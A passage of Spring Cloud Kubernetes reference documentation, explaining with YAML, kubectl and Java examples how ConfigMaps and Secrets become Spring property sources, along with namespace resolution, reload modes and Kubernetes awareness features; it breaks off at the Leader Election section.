In order to enable this functionality you need to add\n`@EnableScheduling` on a configuration class in your application.\n\n== Kubernetes native service discovery\n\nKubernetes itself is capable of (server side) service discovery (see: https:\/\/kubernetes.io\/docs\/concepts\/services-networking\/service\/#discovering-services).\nUsing native kubernetes service discovery ensures compatibility with additional tooling, such as Istio (https:\/\/istio.io), a service mesh that is capable of load balancing, circuit breaker, failover, and much more.\n\nThe caller service then need only refer to names resolvable in a particular Kubernetes cluster. A simple implementation might use a spring `RestTemplate` that refers to a fully qualified domain name (FQDN), such as `https:\/\/{service-name}.{namespace}.svc.{cluster}.local:{service-port}`.\n\nAdditionally, you can use Hystrix for:\n\n* Circuit breaker implementation on the caller side, by annotating the spring boot application class with `@EnableCircuitBreaker`\n* Fallback functionality, by annotating the respective method with `@HystrixCommand(fallbackMethod=`\n\n== Kubernetes PropertySource implementations\n\nThe most common approach to configuring your Spring Boot application is to create an `application.properties` or `application.yaml` or\nan `application-profile.properties` or `application-profile.yaml` file that contains key-value pairs that provide customization values to your\napplication or Spring Boot starters. You can override these properties by specifying system properties or environment\nvariables.\n\n[[configmap-propertysource]]\n=== Using a `ConfigMap` `PropertySource`\n\nKubernetes provides a resource named https:\/\/kubernetes.io\/docs\/user-guide\/configmap\/[`ConfigMap`] to externalize the\nparameters to pass to your application in the form of key-value pairs or embedded `application.properties` or `application.yaml` files.\nThe link:https:\/\/github.com\/spring-cloud\/spring-cloud-kubernetes\/tree\/master\/spring-cloud-kubernetes-fabric8-config[Spring Cloud Kubernetes Config] project makes Kubernetes `ConfigMap` instances available\nduring application bootstrapping and triggers hot reloading of beans or Spring context when changes are detected on\nobserved `ConfigMap` instances.\n\nThe default behavior is to create a `Fabric8ConfigMapPropertySource` based on a Kubernetes `ConfigMap` that has a `metadata.name` value of either the name of\nyour Spring application (as defined by its `spring.application.name` property) or a custom name defined within the\n`bootstrap.properties` file under the following key: `spring.cloud.kubernetes.config.name`.\n\nHowever, more advanced configuration is possible where you can use multiple `ConfigMap` instances.\nThe `spring.cloud.kubernetes.config.sources` list makes this possible.\nFor example, you could define the following `ConfigMap` instances:\n\n====\n[source,yaml]\n----\nspring:\n application:\n name: cloud-k8s-app\n cloud:\n kubernetes:\n config:\n name: default-name\n namespace: default-namespace\n sources:\n # Spring Cloud Kubernetes looks up a ConfigMap named c1 in namespace default-namespace\n - name: c1\n # Spring Cloud Kubernetes looks up a ConfigMap named default-name in whatever namespace n2\n - namespace: n2\n # Spring Cloud Kubernetes looks up a ConfigMap named c3 in namespace n3\n - namespace: n3\n name: c3\n----\n====\n\nIn the preceding example, if `spring.cloud.kubernetes.config.namespace` had not been set,\nthe `ConfigMap` named `c1` would be looked up in the namespace that 
the application runs.\nSee <<namespace-resolution,Namespace resolution>> to get a better understanding of how the namespace\nof the application is resolved.\n\n\nAny matching `ConfigMap` that is found is processed as follows:\n\n* Apply individual configuration properties.\n* Apply as `yaml` the content of any property named `application.yaml`.\n* Apply as a properties file the content of any property named `application.properties`.\n\nThe single exception to the aforementioned flow is when the `ConfigMap` contains a *single* key that indicates\nthe file is a YAML or properties file. In that case, the name of the key does NOT have to be `application.yaml` or\n`application.properties` (it can be anything) and the value of the property is treated correctly.\nThis feature facilitates the use case where the `ConfigMap` was created by using something like the following:\n\n====\n[source]\n----\nkubectl create configmap game-config --from-file=\/path\/to\/app-config.yaml\n----\n====\n\nAssume that we have a Spring Boot application named `demo` that uses the following properties to read its thread pool\nconfiguration.\n\n* `pool.size.core`\n* `pool.size.maximum`\n\nThis can be externalized to a config map in `yaml` format as follows:\n\n====\n[source,yaml]\n----\nkind: ConfigMap\napiVersion: v1\nmetadata:\n name: demo\ndata:\n pool.size.core: 1\n pool.size.maximum: 16\n----\n====\n\nIndividual properties work fine for most cases. However, sometimes, embedded `yaml` is more convenient. In this case, we\nuse a single property named `application.yaml` to embed our `yaml`, as follows:\n\n====\n[source,yaml]\n----\nkind: ConfigMap\napiVersion: v1\nmetadata:\n name: demo\ndata:\n application.yaml: |-\n pool:\n size:\n core: 1\n maximum: 16\n----\n====\n\nThe following example also works:\n\n====\n[source,yaml]\n----\nkind: ConfigMap\napiVersion: v1\nmetadata:\n name: demo\ndata:\n custom-name.yaml: |-\n pool:\n size:\n core: 1\n maximum: 16\n----\n====\n\n
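On the application side, individual properties such as the thread-pool ones above are typically consumed through a `@ConfigurationProperties` bean. The following is only a minimal sketch (the class name is illustrative, and the bean still needs to be registered, for example via `@EnableConfigurationProperties`):\n\n====\n[source,java]\n----\nimport org.springframework.boot.context.properties.ConfigurationProperties;\n\n\/\/ Binds pool.size.core and pool.size.maximum from any of the ConfigMap\n\/\/ shapes shown above (individual properties or embedded YAML).\n@ConfigurationProperties(prefix = \"pool.size\")\npublic class PoolProperties {\n\n\tprivate int core;\n\n\tprivate int maximum;\n\n\tpublic int getCore() { return core; }\n\n\tpublic void setCore(int core) { this.core = core; }\n\n\tpublic int getMaximum() { return maximum; }\n\n\tpublic void setMaximum(int maximum) { this.maximum = maximum; }\n}\n----\n====\n\n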
You can also configure Spring Boot applications differently depending on active profiles that are merged together\nwhen the `ConfigMap` is read. You can provide different property values for different profiles by using an\n`application.properties` or `application.yaml` property, specifying profile-specific values, each in their own document\n(indicated by the `---` sequence), as follows:\n\n====\n[source,yaml]\n----\nkind: ConfigMap\napiVersion: v1\nmetadata:\n name: demo\ndata:\n application.yml: |-\n greeting:\n message: Say Hello to the World\n farewell:\n message: Say Goodbye\n ---\n spring:\n profiles: development\n greeting:\n message: Say Hello to the Developers\n farewell:\n message: Say Goodbye to the Developers\n ---\n spring:\n profiles: production\n greeting:\n message: Say Hello to the Ops\n----\n====\n\nIn the preceding case, the configuration loaded into your Spring Application with the `development` profile is as follows:\n\n====\n[source,yaml]\n----\n greeting:\n message: Say Hello to the Developers\n farewell:\n message: Say Goodbye to the Developers\n----\n====\n\nHowever, if the `production` profile is active, the configuration becomes:\n\n====\n[source,yaml]\n----\n greeting:\n message: Say Hello to the Ops\n farewell:\n message: Say Goodbye\n----\n====\n\nIf both profiles are active, the property that appears last within the `ConfigMap` overwrites any preceding values.\n\nAnother option is to create a different config map per profile, and Spring Boot will automatically fetch it based\non the active profiles:\n\n====\n[source,yaml]\n----\nkind: ConfigMap\napiVersion: v1\nmetadata:\n name: demo\ndata:\n application.yml: |-\n greeting:\n message: Say Hello to the World\n farewell:\n message: Say Goodbye\n----\n====\n====\n[source,yaml]\n----\nkind: ConfigMap\napiVersion: v1\nmetadata:\n name: demo-development\ndata:\n application.yml: |-\n spring:\n profiles: development\n greeting:\n message: Say Hello to the Developers\n farewell:\n message: Say Goodbye to the Developers\n----\n====\n====\n[source,yaml]\n----\nkind: ConfigMap\napiVersion: v1\nmetadata:\n name: demo-production\ndata:\n application.yml: |-\n spring:\n profiles: production\n greeting:\n message: Say Hello to the Ops\n farewell:\n message: Say Goodbye\n----\n====\n\n\nTo tell Spring Boot which `profile` should be enabled at bootstrap, you can pass the `SPRING_PROFILES_ACTIVE` environment variable.\nTo do so, you can define it in the PodSpec, at the container specification of the Deployment resource file, as follows:\n\n====\n[source,yaml]\n----\napiVersion: apps\/v1\nkind: Deployment\nmetadata:\n name: deployment-name\n labels:\n app: deployment-name\nspec:\n replicas: 1\n selector:\n matchLabels:\n app: deployment-name\n template:\n metadata:\n labels:\n app: deployment-name\n spec:\n containers:\n - name: container-name\n image: your-image\n env:\n - name: SPRING_PROFILES_ACTIVE\n value: \"development\"\n----\n====\n\nYou could run into a situation where there are multiple config maps that have the same property names. For example:\n\n====\n[source,yaml]\n----\nkind: ConfigMap\napiVersion: v1\nmetadata:\n name: config-map-one\ndata:\n application.yml: |-\n greeting:\n message: Say Hello from one\n----\n====\n\nand\n\n====\n[source,yaml]\n----\nkind: ConfigMap\napiVersion: v1\nmetadata:\n name: config-map-two\ndata:\n application.yml: |-\n greeting:\n message: Say Hello from two\n----\n====\n\nDepending on the order in which you place these in `bootstrap.yaml|properties`, you might end up with an unexpected result (the last config map wins). 
For example:\n\n====\n[source,yaml]\n----\nspring:\n application:\n name: cloud-k8s-app\n cloud:\n kubernetes:\n config:\n namespace: default-namespace\n sources:\n - name: config-map-two\n - name: config-map-one\n----\n====\n\nwill result in the property `greeting.message` being `Say Hello from one`.\n\nThere is a way to change this default configuration by specifying `useNameAsPrefix`. For example:\n\n====\n[source,yaml]\n----\nspring:\n application:\n name: with-prefix\n cloud:\n kubernetes:\n config:\n useNameAsPrefix: true\n namespace: default-namespace\n sources:\n - name: config-map-one\n useNameAsPrefix: false\n - name: config-map-two\n----\n====\n\nSuch a configuration will result in two properties being generated:\n\n - `greeting.message` equal to `Say Hello from one`.\n\n - `config-map-two.greeting.message` equal to `Say Hello from two`.\n\nNotice that `spring.cloud.kubernetes.config.useNameAsPrefix` has a _lower_ priority than `spring.cloud.kubernetes.config.sources.useNameAsPrefix`.\nThis allows you to set a \"default\" strategy for all sources, while at the same time allowing you to override only a few.\n\nIf using the config map name is not an option, you can specify a different strategy, called `explicitPrefix`. Since this is an _explicit_ prefix that\nyou select, it can only be supplied to the `sources` level. At the same time it has a higher priority than `useNameAsPrefix`. Let's suppose we have a third config map with these entries:\n\n\n====\n[source,yaml]\n----\nkind: ConfigMap\napiVersion: v1\nmetadata:\n name: config-map-three\ndata:\n application.yml: |-\n greeting:\n message: Say Hello from three\n----\n====\n\nA configuration like the one below:\n\n====\n[source,yaml]\n----\nspring:\n application:\n name: with-prefix\n cloud:\n kubernetes:\n config:\n useNameAsPrefix: true\n namespace: default-namespace\n sources:\n - name: config-map-one\n useNameAsPrefix: false\n - name: config-map-two\n explicitPrefix: two\n - name: config-map-three\n----\n====\n\nwill result in three properties being generated:\n\n - `greeting.message` equal to `Say Hello from one`.\n\n - `two.greeting.message` equal to `Say Hello from two`.\n\n - `config-map-three.greeting.message` equal to `Say Hello from three`.\n\nBy default, besides reading the config map that is specified in the `sources` configuration, Spring will also try to read\nall properties from \"profile aware\" sources. The easiest way to explain this is via an example. Let's suppose your application\nenables a profile called \"dev\" and you have a configuration like the one below:\n\n====\n[source,yaml]\n----\nspring:\n application:\n name: spring-k8s\n cloud:\n kubernetes:\n config:\n namespace: default-namespace\n sources:\n - name: config-map-one\n----\n====\n\nBesides reading the `config-map-one`, Spring will also try to read `config-map-one-dev`; in this particular order. Each active profile\ngenerates such a profile aware config map.\n\nThough your application should not be impacted by such a config map, it can be disabled if needed:\n\n====\n[source,yaml]\n----\nspring:\n application:\n name: spring-k8s\n cloud:\n kubernetes:\n config:\n includeProfileSpecificSources: false\n namespace: default-namespace\n sources:\n - name: config-map-one\n includeProfileSpecificSources: false\n----\n====\n\nNotice that just like before, there are two levels where you can specify this property: for all config maps or\nfor individual ones, with the latter having a higher priority.\n\nNOTE: You should check the security configuration section. 
To access config maps from inside a pod you need to have the correct\nKubernetes service accounts, roles and role bindings.\n\nAnother option for using `ConfigMap` instances is to mount them into the Pod that runs the Spring Cloud Kubernetes application\nand have Spring Cloud Kubernetes read them from the file system.\nThis behavior is controlled by the `spring.cloud.kubernetes.config.paths` property. You can use it in\naddition to or instead of the mechanism described earlier.\nYou can specify multiple (exact) file paths in `spring.cloud.kubernetes.config.paths` by using the `,` delimiter.\n\nNOTE: You have to provide the full exact path to each property file, because directories are not recursively parsed.\n\nNOTE: If you use `spring.cloud.kubernetes.config.paths` or `spring.cloud.kubernetes.secrets.path`, the automatic reload\nfunctionality will not work. You will need to make a `POST` request to the `\/actuator\/refresh` endpoint or\nrestart\/redeploy the application.\n\n[#config-map-fail-fast]\nIn some cases, your application may be unable to load some of your `ConfigMaps` using the Kubernetes API.\nIf you want your application to fail the start-up process in such cases, you can set\n`spring.cloud.kubernetes.config.fail-fast=true` to make the application start-up fail with an Exception.\n\n[#config-map-retry]\nYou can also make your application retry loading `ConfigMap` property sources on a failure. First, you need to\nset `spring.cloud.kubernetes.config.fail-fast=true`. Then you need to add `spring-retry`\nand `spring-boot-starter-aop` to your classpath. You can configure retry properties such as\nthe maximum number of attempts and backoff options such as the initial interval, multiplier, and max interval by setting the\n`spring.cloud.kubernetes.config.retry.*` properties.\n\nNOTE: If you already have `spring-retry` and `spring-boot-starter-aop` on the classpath for some reason\nand want to enable fail-fast, but do not want retry to be enabled, you can disable retry for `ConfigMap` `PropertySources`\nby setting `spring.cloud.kubernetes.config.retry.enabled=false`.\n\n.Properties:\n[options=\"header,footer\"]\n|===\n| Name | Type | Default | Description\n| `spring.cloud.kubernetes.config.enabled` | `Boolean` | `true` | Enable ConfigMaps `PropertySource`\n| `spring.cloud.kubernetes.config.name` | `String` | `${spring.application.name}` | Sets the name of `ConfigMap` to look up\n| `spring.cloud.kubernetes.config.namespace` | `String` | Client namespace | Sets the Kubernetes namespace where to look up\n| `spring.cloud.kubernetes.config.paths` | `List` | `null` | Sets the paths where `ConfigMap` instances are mounted\n| `spring.cloud.kubernetes.config.enableApi` | `Boolean` | `true` | Enable or disable consuming `ConfigMap` instances through APIs\n| `spring.cloud.kubernetes.config.fail-fast` | `Boolean` | `false` | Enable or disable failing the application start-up when an error occurs while loading a `ConfigMap`\n| `spring.cloud.kubernetes.config.retry.enabled` | `Boolean` | `true` | Enable or disable config retry.\n| `spring.cloud.kubernetes.config.retry.initial-interval` | `Long` | `1000` | Initial retry interval in milliseconds.\n| `spring.cloud.kubernetes.config.retry.max-attempts` | `Integer` | `6` | Maximum number of attempts.\n| `spring.cloud.kubernetes.config.retry.max-interval` | `Long` | `2000` | Maximum interval for backoff.\n| `spring.cloud.kubernetes.config.retry.multiplier` | `Double` | `1.1` | Multiplier for next interval.\n|===\n\n=== Secrets PropertySource\n\nKubernetes has 
the notion of https:\/\/kubernetes.io\/docs\/concepts\/configuration\/secret\/[Secrets] for storing\nsensitive data such as passwords, OAuth tokens, and so on. This project provides integration with `Secrets` to make secrets\naccessible by Spring Boot applications. You can explicitly enable or disable this feature by setting the `spring.cloud.kubernetes.secrets.enabled` property.\n\nWhen enabled, the `Fabric8SecretsPropertySource` looks up `Secrets` in Kubernetes from the following sources:\n\n. Reading recursively from secrets mounts\n. Named after the application (as defined by `spring.application.name`)\n. Matching some labels\n\n*Note:*\n\nBy default, consuming Secrets through the API (points 2 and 3 above) *is not enabled* for security reasons. The permission 'list' on secrets allows clients to inspect secret values in the specified namespace.\nFurther, we recommend that containers share secrets through mounted volumes.\n\nIf you enable consuming Secrets through the API, we recommend that you limit access to Secrets by using an authorization policy, such as RBAC.\nFor more information about risks and best practices when consuming Secrets through the API, refer to https:\/\/kubernetes.io\/docs\/concepts\/configuration\/secret\/#best-practices[this doc].\n\nIf the secrets are found, their data is made available to the application.\n\nAssume that we have a Spring Boot application named `demo` that uses properties to read its database\nconfiguration. We can create a Kubernetes secret by using the following command:\n\n====\n[source]\n----\nkubectl create secret generic db-secret --from-literal=username=user --from-literal=password=p455w0rd\n----\n====\n\nThe preceding command would create the following secret (which you can see by using `kubectl get secrets db-secret -o yaml`):\n\n====\n[source,yaml]\n----\napiVersion: v1\ndata:\n password: cDQ1NXcwcmQ=\n username: dXNlcg==\nkind: Secret\nmetadata:\n creationTimestamp: 2017-07-04T09:15:57Z\n name: db-secret\n namespace: default\n resourceVersion: \"357496\"\n selfLink: \/api\/v1\/namespaces\/default\/secrets\/db-secret\n uid: 63c89263-6099-11e7-b3da-76d6186905a8\ntype: Opaque\n----\n====\n\nNote that the data contains Base64-encoded versions of the literals provided by the `create` command.\n\nYour application can then use this secret -- for example, by exporting the secret's values as environment variables:\n\n====\n[source,yaml]\n----\napiVersion: apps\/v1\nkind: Deployment\nmetadata:\n name: ${project.artifactId}\nspec:\n template:\n spec:\n containers:\n - env:\n - name: DB_USERNAME\n valueFrom:\n secretKeyRef:\n name: db-secret\n key: username\n - name: DB_PASSWORD\n valueFrom:\n secretKeyRef:\n name: db-secret\n key: password\n----\n====\n\nYou can select the Secrets to consume in a number of ways:\n\n. By listing the directories where secrets are mapped:\n+\n====\n[source,bash]\n----\n-Dspring.cloud.kubernetes.secrets.paths=\/etc\/secrets\/db-secret,\/etc\/secrets\/postgresql\n----\n====\n+\nIf you have all the secrets mapped to a common root, you can set them as follows:\n+\n====\n[source,bash]\n----\n-Dspring.cloud.kubernetes.secrets.paths=\/etc\/secrets\n----\n====\n\n. By setting a named secret:\n+\n====\n[source,bash]\n----\n-Dspring.cloud.kubernetes.secrets.name=db-secret\n----\n====\n\n. 
By defining a list of labels:\n+\n====\n[source,bash]\n----\n-Dspring.cloud.kubernetes.secrets.labels.broker=activemq\n-Dspring.cloud.kubernetes.secrets.labels.db=postgresql\n----\n====\n\nAs is the case with `ConfigMap`, more advanced configuration is also possible where you can use multiple `Secret`\ninstances. The `spring.cloud.kubernetes.secrets.sources` list makes this possible.\nFor example, you could define the following `Secret` instances:\n\n====\n[source,yaml]\n----\nspring:\n application:\n name: cloud-k8s-app\n cloud:\n kubernetes:\n secrets:\n name: default-name\n namespace: default-namespace\n sources:\n # Spring Cloud Kubernetes looks up a Secret named s1 in namespace default-namespace\n - name: s1\n # Spring Cloud Kubernetes looks up a Secret named default-name in namespace n2\n - namespace: n2\n # Spring Cloud Kubernetes looks up a Secret named s3 in namespace n3\n - namespace: n3\n name: s3\n----\n====\n\nIn the preceding example, if `spring.cloud.kubernetes.secrets.namespace` had not been set,\nthe `Secret` named `s1` would be looked up in the namespace that the application runs.\nSee <<namespace-resolution,Namespace resolution>> to get a better understanding of how the namespace\nof the application is resolved.\n\n<<config-map-fail-fast,Similar to the `ConfigMaps`>>, if you want your application to fail to start\nwhen it is unable to load `Secrets` property sources, you can set `spring.cloud.kubernetes.secrets.fail-fast=true`.\n\nIt is also possible to enable retry for `Secret` property sources <<config-map-retry,like the `ConfigMaps`>>.\nAs with the `ConfigMap` property sources, first you need to set `spring.cloud.kubernetes.secrets.fail-fast=true`.\nThen you need to add `spring-retry` and `spring-boot-starter-aop` to your classpath.\nRetry behavior of the `Secret` property sources can be configured by setting the `spring.cloud.kubernetes.secrets.retry.*`\nproperties.\n\nNOTE: If you already have `spring-retry` and `spring-boot-starter-aop` on the classpath for some reason\nand want to enable fail-fast, but do not want retry to be enabled, you can disable retry for `Secrets` `PropertySources`\nby setting `spring.cloud.kubernetes.secrets.retry.enabled=false`.\n\n.Properties:\n[options=\"header,footer\"]\n|===\n| Name | Type | Default | Description\n| `spring.cloud.kubernetes.secrets.enabled` | `Boolean` | `true` | Enable Secrets `PropertySource`\n| `spring.cloud.kubernetes.secrets.name` | `String` | `${spring.application.name}` | Sets the name of the secret to look up\n| `spring.cloud.kubernetes.secrets.namespace` | `String` | Client namespace | Sets the Kubernetes namespace where to look up\n| `spring.cloud.kubernetes.secrets.labels` | `Map` | `null` | Sets the labels used to look up secrets\n| `spring.cloud.kubernetes.secrets.paths` | `List` | `null` | Sets the paths where secrets are mounted (example 1)\n| `spring.cloud.kubernetes.secrets.enableApi` | `Boolean` | `false` | Enables or disables consuming secrets through APIs (examples 2 and 3)\n| `spring.cloud.kubernetes.secrets.fail-fast` | `Boolean` | `false` | Enable or disable failing the application start-up when an error occurs while loading a `Secret`\n| `spring.cloud.kubernetes.secrets.retry.enabled` | `Boolean` | `true` | Enable or disable secrets retry.\n| `spring.cloud.kubernetes.secrets.retry.initial-interval` | `Long` | `1000` | Initial retry interval in milliseconds.\n| `spring.cloud.kubernetes.secrets.retry.max-attempts` | `Integer` | `6` | Maximum number of attempts.\n| 
`spring.cloud.kubernetes.secrets.retry.max-interval` | `Long` | `2000` | Maximum interval for backoff.\n| `spring.cloud.kubernetes.secrets.retry.multiplier` | `Double` | `1.1` | Multiplier for next interval.\n|===\n\nNotes:\n\n* The `spring.cloud.kubernetes.secrets.labels` property behaves as defined by\nhttps:\/\/github.com\/spring-projects\/spring-boot\/wiki\/Spring-Boot-Configuration-Binding#map-based-binding[Map-based binding].\n* The `spring.cloud.kubernetes.secrets.paths` property behaves as defined by\nhttps:\/\/github.com\/spring-projects\/spring-boot\/wiki\/Spring-Boot-Configuration-Binding#collection-based-binding[Collection-based binding].\n* Access to secrets through the API may be restricted for security reasons. The preferred way is to mount secrets to the Pod.\n\nYou can find an example of an application that uses secrets (though it has not been updated to use the new `spring-cloud-kubernetes` project) at\nhttps:\/\/github.com\/fabric8-quickstarts\/spring-boot-camel-config[spring-boot-camel-config]\n\n[[namespace-resolution]]\n=== Namespace resolution\nFinding an application namespace happens on a best-effort basis. There are several steps that we iterate through in order\nto find it. The easiest and most common one is to specify it in the proper configuration, for example:\n\n====\n[source,yaml]\n----\nspring:\n application:\n name: app\n cloud:\n kubernetes:\n secrets:\n name: secret\n namespace: default\n sources:\n # Spring Cloud Kubernetes looks up a Secret named 'a' in namespace 'default'\n - name: a\n # Spring Cloud Kubernetes looks up a Secret named 'secret' in namespace 'b'\n - namespace: b\n # Spring Cloud Kubernetes looks up a Secret named 'd' in namespace 'c'\n - namespace: c\n name: d\n----\n====\n\nRemember that the same can be done for config maps. If such a namespace is not specified, it will be read (in this order):\n\n1. from the property `spring.cloud.kubernetes.client.namespace`\n2. from a String residing in a file denoted by the `spring.cloud.kubernetes.client.serviceAccountNamespacePath` property\n3. from a String residing in the `\/var\/run\/secrets\/kubernetes.io\/serviceaccount\/namespace` file\n(kubernetes default namespace path)\n4. from a designated client method call (for example, fabric8's `KubernetesClient::getNamespace`), if the client provides\nsuch a method. This, in turn, could be configured via environment properties. For example, the fabric8 client can be configured via the\n\"KUBERNETES_NAMESPACE\" property; consult the client documentation for exact details.\n\nFailure to find a namespace from the above steps will result in an Exception being raised.\n\n=== `PropertySource` Reload\n\nWARNING: This functionality has been deprecated in the 2020.0 release. Please see\nthe <<spring-cloud-kubernetes-configuration-watcher>> controller for an alternative way\nto achieve the same functionality.\n\nSome applications may need to detect changes on external property sources and update their internal status to reflect the new configuration.\nThe reload feature of Spring Cloud Kubernetes is able to trigger an application reload when a related `ConfigMap` or\n`Secret` changes.\n\nBy default, this feature is disabled. 
You can enable it by using the `spring.cloud.kubernetes.reload.enabled=true` configuration property (for example, in the `application.properties` file).\n\nThe following levels of reload are supported (by setting the `spring.cloud.kubernetes.reload.strategy` property):\n\n* `refresh` (default): Only configuration beans annotated with `@ConfigurationProperties` or `@RefreshScope` are reloaded.\nThis reload level leverages the refresh feature of Spring Cloud Context.\n\n* `restart_context`: the whole Spring `ApplicationContext` is gracefully restarted. Beans are recreated with the new configuration.\nIn order for the restart context functionality to work properly you must enable and expose the restart actuator endpoint:\n+\n====\n[source,yaml]\n----\nmanagement:\n endpoint:\n restart:\n enabled: true\n endpoints:\n web:\n exposure:\n include: restart\n----\n====\n\n* `shutdown`: the Spring `ApplicationContext` is shut down to activate a restart of the container.\n When you use this level, make sure that the lifecycle of all non-daemon threads is bound to the `ApplicationContext`\nand that a replication controller or replica set is configured to restart the pod.\n\nAssuming that the reload feature is enabled with default settings (`refresh` mode), the following bean is refreshed when the config map changes:\n\n====\n[source,java]\n----\n@Configuration\n@ConfigurationProperties(prefix = \"bean\")\npublic class MyConfig {\n\n private String message = \"a message that can be changed live\";\n\n \/\/ getter and setters\n\n}\n----\n====\n\nTo see that changes effectively happen, you can create another bean that prints the message periodically, as follows:\n\n====\n[source,java]\n----\n@Component\npublic class MyBean {\n\n @Autowired\n private MyConfig config;\n\n @Scheduled(fixedDelay = 5000)\n public void hello() {\n System.out.println(\"The message is: \" + config.getMessage());\n }\n}\n----\n====\n\nYou can change the message printed by the application by using a `ConfigMap`, as follows:\n\n====\n[source,yaml]\n----\napiVersion: v1\nkind: ConfigMap\nmetadata:\n name: reload-example\ndata:\n application.properties: |-\n bean.message=Hello World!\n----\n====\n\nAny change to the property named `bean.message` in the `ConfigMap` associated with the pod is reflected in the\noutput. More generally speaking, changes associated with properties prefixed with the value defined by the `prefix`\nfield of the `@ConfigurationProperties` annotation are detected and reflected in the application.\n<<configmap-propertysource,Associating a `ConfigMap` with a pod>> is explained earlier in this chapter.\n\nThe full example is available in https:\/\/github.com\/spring-cloud\/spring-cloud-kubernetes\/tree\/main\/spring-cloud-kubernetes-examples\/kubernetes-reload-example[`spring-cloud-kubernetes-reload-example`].\n\nThe reload feature supports two operating modes:\n\n* Event (default): Watches for changes in config maps or secrets by using the Kubernetes API (web socket).\nAny event produces a re-check on the configuration and, in case of changes, a reload.\nThe `view` role on the service account is required in order to listen for config map changes. 
A higher level role (such as `edit`) is required for secrets\n(by default, secrets are not monitored).\n* Polling: Periodically re-creates the configuration from config maps and secrets to see if it has changed.\nYou can configure the polling period by using the `spring.cloud.kubernetes.reload.period` property, which defaults to 15 seconds.\nIt requires the same role as the monitored property source.\nThis means, for example, that using polling on file-mounted secret sources does not require particular privileges.\n\n.Properties:\n[options=\"header,footer\"]\n|===\n| Name | Type | Default | Description\n| `spring.cloud.kubernetes.reload.enabled` | `Boolean` | `false` | Enables monitoring of property sources and configuration reload\n| `spring.cloud.kubernetes.reload.monitoring-config-maps` | `Boolean` | `true` | Allow monitoring changes in config maps\n| `spring.cloud.kubernetes.reload.monitoring-secrets` | `Boolean` | `false` | Allow monitoring changes in secrets\n| `spring.cloud.kubernetes.reload.strategy` | `Enum` | `refresh` | The strategy to use when firing a reload (`refresh`, `restart_context`, or `shutdown`)\n| `spring.cloud.kubernetes.reload.mode` | `Enum` | `event` | Specifies how to listen for changes in property sources (`event` or `polling`)\n| `spring.cloud.kubernetes.reload.period` | `Duration`| `15s` | The period for verifying changes when using the `polling` strategy\n|===\n\nNotes:\n\n* You should not use properties under `spring.cloud.kubernetes.reload` in config maps or secrets. Changing such properties at runtime may lead to unexpected results.\n* Deleting a property or the whole config map does not restore the original state of the beans when you use the `refresh` level.\n\n== Kubernetes Ecosystem Awareness\n\nAll features described earlier in this guide work equally well, regardless of whether your application is running inside\nKubernetes. This is really helpful for development and troubleshooting.\nFrom a development point of view, this lets you start your Spring Boot application and debug one\nof the modules that is part of this project. You need not deploy it in Kubernetes,\nas the code of the project relies on the\nhttps:\/\/github.com\/fabric8io\/kubernetes-client[Fabric8 Kubernetes Java client], which is a fluent DSL that can\ncommunicate over the `http` protocol with the REST API of the Kubernetes Server.\n\nKubernetes awareness is based on the Spring Boot API, specifically on https:\/\/docs.spring.io\/spring-boot\/docs\/current\/api\/org\/springframework\/boot\/autoconfigure\/condition\/ConditionalOnCloudPlatform.html[ConditionalOnCloudPlatform].\nThat annotation auto-detects whether your application is currently deployed in Kubernetes. It is possible to override\nthat setting via `spring.main.cloud-platform`.\n\nFor example, if you need to test some features, but do not want to deploy to a cluster, it is enough to set\n`spring.main.cloud-platform=KUBERNETES`. 
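As a minimal `application.properties` sketch:\n\n====\n[source,properties]\n----\n# force CloudPlatform detection to KUBERNETES, even when running outside a cluster\nspring.main.cloud-platform=KUBERNETES\n----\n====\n\n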
This will make `spring-cloud-kubernetes` act as if it were deployed in a real cluster.\nBe aware that when `spring-cloud-kubernetes-config` is on the classpath, `spring.main.cloud-platform` should be set in `bootstrap.{properties|yml}`\n(or the profile specific one), otherwise it should be in `application.{properties|yml}` (or the profile specific one).\nAlso note that the properties `spring.cloud.kubernetes.config.enabled` and `spring.cloud.kubernetes.secrets.enabled`\nonly take effect when set in `bootstrap.{properties|yml}`.\n\n=== Breaking Changes In 3.0.x\n\nIn versions of Spring Cloud Kubernetes prior to `3.0.x`, Kubernetes awareness was implemented using the `spring.cloud.kubernetes.enabled` property. This\nproperty was removed and is unsupported. Instead, we use the Spring Boot API: https:\/\/docs.spring.io\/spring-boot\/docs\/current\/api\/org\/springframework\/boot\/autoconfigure\/condition\/ConditionalOnCloudPlatform.html[ConditionalOnCloudPlatform].\nIf you need to explicitly enable or disable this awareness, use `spring.main.cloud-platform=NONE\/KUBERNETES`.\n\n=== Kubernetes Profile Autoconfiguration\n\nWhen the application runs as a pod inside Kubernetes, a Spring profile named `kubernetes` automatically gets activated.\nThis lets you customize the configuration and define beans that are applied when the Spring Boot application is deployed\nwithin the Kubernetes platform (for example, different development and production configuration).\n\n=== Istio Awareness\n\nWhen you include the `spring-cloud-kubernetes-fabric8-istio` module in the application classpath, a new profile is added to the application,\nprovided the application is running inside a Kubernetes Cluster with https:\/\/istio.io[Istio] installed. You can then use\nSpring's `@Profile(\"istio\")` annotation in your Beans and `@Configuration` classes.\n\nThe Istio awareness module uses `me.snowdrop:istio-client` to interact with Istio APIs, letting us discover traffic rules, circuit breakers, and so on,\nmaking it easy for our Spring Boot applications to consume this data to dynamically configure themselves according to the environment.\n\n== Pod Health Indicator\n\nSpring Boot uses https:\/\/github.com\/spring-projects\/spring-boot\/blob\/master\/spring-boot-project\/spring-boot-actuator\/src\/main\/java\/org\/springframework\/boot\/actuate\/health\/HealthEndpoint.java[`HealthIndicator`] to expose info about the health of an application.\nThat makes it really useful for exposing health-related information to the user and makes it a good fit for use as https:\/\/kubernetes.io\/docs\/tasks\/configure-pod-container\/configure-liveness-readiness-probes\/[readiness probes].\n\nThe Kubernetes health indicator (which is part of the core module) exposes the following info:\n\n* Pod name, IP address, namespace, service account, node name, and its IP address\n* A flag that indicates whether the Spring Boot application is internal or external to Kubernetes\n\nYou can disable this `HealthContributor` by setting `management.health.kubernetes.enabled`\nto `false` in `application.[properties | yaml]`.\n\n== Info Contributor\n\nSpring Cloud Kubernetes includes an `InfoContributor` which adds Pod information to\nSpring Boot's `\/info` Actuator endpoint.\n\nYou can disable this `InfoContributor` by setting `management.info.kubernetes.enabled`\nto `false` in `application.[properties | yaml]`.\n\n== Leader Election\nThe Spring Cloud Kubernetes leader election mechanism implements the leader election API of Spring Integration using a 
